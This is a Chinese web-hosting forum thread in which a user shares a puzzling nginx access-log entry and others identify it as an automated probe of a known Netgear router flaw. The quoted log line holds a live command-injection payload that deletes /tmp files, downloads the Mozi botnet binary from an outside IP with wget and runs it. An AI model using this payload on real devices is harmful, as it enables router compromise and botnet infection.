全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 514|回复: 9

nginx 莫名奇妙的日志,请大家分析一下。

[复制链接]
发表于 2024-9-8 12:25:17 | 显示全部楼层 |阅读模式
系统是刚装几天的,就装了 nginx 反代一个docker容器,不是80端口

但是nginx就老发现一些奇怪的日志。

比如下面这个。居然还有 “rm+-rf”  这种命令


117.253.56.151 - - [08/Sep/2024:02:59:55 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.219.161.81:50626/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 146 "-" "-" "-"
发表于 2024-9-8 12:44:00 | 显示全部楼层
调查员 发表于 2024-9-8 12:28
不会吧,用访问不存在网页的方式,也能试漏洞?

他不访问怎么知道不存在?
发表于 2024-9-8 12:26:42 来自手机 | 显示全部楼层
别人在试漏洞,执行命令
 楼主| 发表于 2024-9-8 12:28:10 | 显示全部楼层
loverhoc 发表于 2024-9-8 12:26
别人在试漏洞,执行命令

不会吧,用访问不存在网页的方式,也能试漏洞?
发表于 2024-9-8 12:30:17 来自手机 | 显示全部楼层
这是一个针对路由器的漏洞CNNVD-201306-024
 楼主| 发表于 2024-9-8 12:31:26 | 显示全部楼层
wps 发表于 2024-9-8 12:30
这是一个针对路由器的漏洞CNNVD-201306-024

看来大家的路由器,80端口真的不要轻易打开。
 楼主| 发表于 2024-9-8 12:35:14 | 显示全部楼层
印度人在干坏事。
发表于 2024-9-8 12:50:52 | 显示全部楼层
看这些你不是不是觉得太无聊了?
发表于 2024-9-9 10:32:53 | 显示全部楼层
loc 竟然真有萌新
发表于 2024-9-9 11:15:31 | 显示全部楼层
调查员 发表于 2024-9-8 12:28
不会吧,用访问不存在网页的方式,也能试漏洞?

访问到了说明存在,访问不到说明不存在,就这么一个一个试
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-9-21 21:47 , Processed in 0.064154 second(s), 9 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表